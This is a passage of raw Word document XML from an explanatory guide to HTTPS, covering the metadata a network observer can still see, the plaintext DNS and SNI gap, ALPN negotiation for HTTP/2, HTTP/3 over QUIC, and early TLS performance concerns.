              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="4E341BC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9714F3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Destination IP address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0B7EFA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes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130859" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>TCP layer (below TLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="683E205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1A1B73" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Port number (443)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9BDE2C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes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A71E32" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>TCP layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="5DEA2E6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6B3140" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Domain name (SNI)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4D2BF5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes*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9C2954" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Sent in TLS ClientHello plaintext</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="7F2902F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0298FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Packet sizes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B3A92F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes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6E1504" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Can infer content type/page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="220C209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6450CA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Timing patterns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7C4E18" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes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CCBA19" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Can infer user behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3254347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4AC341" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Connection duration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316742" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes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53363B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>How long you're on the site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="79E102B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6CF066" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>That HTTPS is being used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4F63FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes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BB4F61" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Port 443 + TLS record headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4833304E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>*ECH (Encrypted Client Hello) encrypts SNI, but adoption is still limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED0EEC9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 HTTPS and DNS — The Gap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606575AD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The privacy gap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6053FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D826767" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>1. Client resolves api.example.com via DNS (PLAINTEXT — ISP sees the domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC59C22" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>2. Client connects to the IP on port 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E03834A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>3. TLS ClientHello includes SNI: api.example.com (PLAINTEXT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D09DE7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>4. Everything after ServerHello is encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39466FAD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full privacy requires:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> DoH/DoT (encrypted DNS) + ECH (encrypted SNI) + HTTPS (encrypted data). All three are needed to prevent a network observer from knowing which site you're visiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3701A2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="05DB9EB3">
          <v:rect id="_x0000_i3980" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F46901F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. HTTP/2 and HTTP/3 — Why They Require HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113E128" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 HTTP/2 Over HTTPS (Practical Requirement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1AAF4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technically:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> HTTP/2 spec allows plaintext (h2c — HTTP/2 cleartext).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F809EF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In practice:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Every browser implements HTTP/2 ONLY over TLS. No browser supports h2c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA217FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677EAFDA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="892"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Network middleboxes (proxies, firewalls, NATs) that inspect/modify HTTP/1.1 traffic would break on HTTP/2's binary framing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D3CD4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="892"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS encrypts the content → middleboxes can't interfere → HTTP/2 works reliably.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C834372" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="892"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The TLS handshake provides a clean opportunity to negotiate HTTP/2 (via ALPN extension).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF2941" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ALPN (Application-Layer Protocol Negotiation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EA657" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>During TLS handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236017AC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878E093" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ClientHello ALPN: ["h2", "http/1.1"]  (I prefer HTTP/2, fall back to HTTP/1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C3EFF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ServerHello ALPN: "h2"                (Server supports HTTP/2, let's use it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58197D13" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Protocol negotiation happens WITHIN the TLS handshake — zero extra round trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E023D5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 HTTP/3 over QUIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB8BBB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>HTTP/3 uses QUIC (UDP-based transport with built-in TLS 1.3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC473E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="893"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS is not a separate layer — it's INTEGRATED into QUIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E060C37" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="893"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>You cannot have HTTP/3 without encryption. It's encryption by design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F42AB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="893"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The handshake combines QUIC connection establishment + TLS 1.3 in a single round trip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D65CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="893"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>0-RTT is native to QUIC — first data can be sent immediately on reconnection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB72E7B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="5563EEAD">
          <v:rect id="_x0000_i3981" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="407F09C3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. HTTPS Performance — Myths vs. Reality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A658F3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Historical Performance Concerns (Mostly Solved)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF5DAF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Myth: "HTTPS is significantly slower than HTTP."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA9E2A2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2010 reality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66683572" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS 1.0/1.1: 2 RTT handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D73306" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>RSA key exchange: 2048-bit RSA decryption on every connection (~5ms CPU per connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CD5A80" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No hardware AES acceleration in common CPUs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915BADE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No session resumption standardized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AE8C60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No OCSP stapling (revocation checks added 100ms+ latency).</w:t>
      </w:r>
    </w:p>
